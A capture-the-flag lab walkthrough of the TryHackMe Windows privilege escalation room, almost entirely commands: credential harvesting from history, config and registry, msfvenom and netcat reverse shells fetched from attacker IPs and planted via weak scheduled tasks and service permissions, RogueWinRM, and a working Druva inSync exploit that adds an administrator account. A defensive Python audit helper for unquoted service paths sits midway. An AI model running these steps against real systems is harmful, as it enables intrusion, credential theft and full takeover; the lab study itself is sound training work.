Windows Privilege Escalation
Room Link: https://tryhackme.com/room/windowsprivesc20
Harvesting Passwords from Usual Spots
A password for the julia.jones user has been left on the Powershell history. What is the password?
Victim(cmd)
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
A web server is running on the remote host. Find any interesting password on web.config files associated with IIS. What is the password of the db_admin user?
Victim(cmd)
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
There is a saved password on your Windows credentials. Using cmdkey and runas, spawn a shell for mike.katz and retrieve the flag from his desktop.
Victim(cmd)
cmdkey /list
runas /savecred /user:WPRIVESC1\mike.katz cmd.exe
Retrieve the saved password stored in the saved PuTTY session under your profile. What is the password for the thom.smith user?
Victim(cmd)
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
Other Quick Wins
What is the taskusr1 flag?
Victim(cmd)
schtasks /query /tn vulntask /fo list /v
Victim(cmd)
icacls c:\tasks\schtask.bat
Kali
nc -lvnp 4444
Victim
echo c:\tools\nc64.exe -e cmd.exe $KALI 4444 > C:\tasks\schtask.bat
schtasks /run /tn vulntask
Abusing Service Misconfigurations
Insecure Permissions on Service Executable
Get the flag on svcusr1's desktop
Victim(cmd)
sc qc WindowsScheduler
Victim(cmd)
icacls C:\PROGRA~2\SYSTEM~1\WService.exe
Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4445 -f exe-service -o rev-svc.exe
python2 -m SimpleHTTPServer 81
Victim(Powershell)
wget http://$KALI:81/rev-svc.exe -O rev-svc.exe
Once the payload is on the Windows server, we replace the service executable with it. Because the service runs as a different user, who must be able to execute the payload, we also grant full permissions to the Everyone group.
Victim(Powershell)
cd C:\PROGRA~2\SYSTEM~1\
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F
Kali
nc -lvp 4445
Note: PowerShell has sc as an alias for Set-Content, so you need to use sc.exe to control services from PowerShell this way.
As a result, you'll get a reverse shell with svcusr1 privileges:
Victim(cmd)
sc stop windowsscheduler
sc start windowsscheduler
OR
Victim(Powershell)
sc.exe stop windowsscheduler
sc.exe start windowsscheduler
Unquoted Service Paths
Victim(cmd)
sc qc "disk sorter enterprise"
Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4446 -f exe-service -o rev-svc2.exe
python2 -m SimpleHTTPServer 81
Victim(Powershell)
wget http://10.10.15.215:81/rev-svc2.exe -O rev-svc2.exe
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F
Kali
nc -lvp 4446
Victim(cmd)
sc.exe stop "disk sorter enterprise"
sc.exe start "disk sorter enterprise"
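An added audit helper written for these notes (my own example, not code from the TryHackMe room): given a BINARY_PATH_NAME as sc qc prints it, it lists the executables Windows would probe before the real one on an unquoted path with spaces (the C:\MyPrograms\Disk.exe case above), and flags icacls entries that give Everyone or Users write rights to a service binary. The service names, paths and ACL lines in it are constructed samples.

```python
import re

# Principals every authenticated user belongs to; write rights here are a finding.
LOW_PRIV = ("Everyone", "BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users")
# icacls simple rights that let a user modify or replace the file.
WRITE_RIGHTS = {"F", "M", "W"}


def executable_part(binpath: str) -> str:
    """Text up to and including the first '.exe'; service arguments are dropped."""
    m = re.search(r"\.exe", binpath, re.IGNORECASE)
    return binpath[: m.end()] if m else binpath


def unquoted_path_candidates(binpath: str) -> list[str]:
    """Paths Windows probes before the real exe of an unquoted service path ([] if safe)."""
    binpath = binpath.strip()
    if binpath.startswith('"'):
        return []
    exe = executable_part(binpath)
    # Each space splits off one candidate: 'C:\Dir\A B\c.exe' -> 'C:\Dir\A.exe', ...
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def weak_icacls_entry(line: str) -> bool:
    """True if an icacls line such as 'Everyone:(I)(F)' gives F, M or W to LOW_PRIV."""
    principal, _, rights = line.strip().partition(":")
    if principal not in LOW_PRIV:
        return False
    tokens = re.findall(r"\(([A-Z,]+)\)", rights)
    return any(r in WRITE_RIGHTS for t in tokens for r in t.split(","))


def audit_services(services: dict[str, str]) -> dict[str, list[str]]:
    """Map each service with an exploitable unquoted path to the paths Windows probes."""
    return {n: c for n, p in services.items() if (c := unquoted_path_candidates(p))}


if __name__ == "__main__":
    # Constructed sample input (names and paths are not from a real host).
    sample = {
        "disk sorter enterprise": r"C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe",
        "ExampleSvc": r'"C:\Program Files\Example Vendor\svc.exe" -run',
        "SafeSvc": r"C:\Windows\System32\svchost.exe -k netsvcs",
    }
    for name, probes in audit_services(sample).items():
        print(f"{name}: unquoted path; secure the parents of {probes}")
    print(weak_icacls_entry(r"Everyone:(I)(F)"))  # True: Everyone can replace the file
```

The directories of the listed probe paths are the ones whose ACLs must deny write access to unprivileged users, or the path must simply be quoted in the service configuration.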
Insecure Service Permissions
Victim(cmd)
cd C:\tools\AccessChk
accesschk64.exe -qlc thmservice
Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4447 -f exe-service -o rev-svc3.exe
python2 -m SimpleHTTPServer 81
Victim(Powershell)
wget http://10.10.15.215:81/rev-svc3.exe -O rev-svc3.exe
Kali
nc -lvp 4447
Victim(Powershell)
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
sc.exe config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
sc.exe stop THMService
sc.exe start THMService
Abusing dangerous privileges

Kali
nc -lvp 4442
Victim(Browser)
c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe 10.10.22.165 4442"
Abusing vulnerable software
Case Study: Druva inSync 6.6.3
Druva_inSync_exploit.ps1
$ErrorActionPreference = "Stop"
# Command to be run through the inSync client: creates a local user and adds it to Administrators
$cmd = "net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add"
# Connect to the inSync client RPC listener on localhost
$s = New-Object System.Net.Sockets.Socket(
[System.Net.Sockets.AddressFamily]::InterNetwork,
[System.Net.Sockets.SocketType]::Stream,
[System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)
# Message layout: protocol header, RPC type, command length, then the UTF-16 command string
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);
$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)
Victim
cd C:\tools\
.\Druva_inSync_exploit.ps1
Victim(Powershell)
runas /user:pwnd "C:\Windows\system32\cmd.exe"
Enter the password for pwnd: SimplePass123
Victim(cmd)
powershell.exe -Command "Start-Process cmd "/k cd /d %cd%" -Verb RunAs"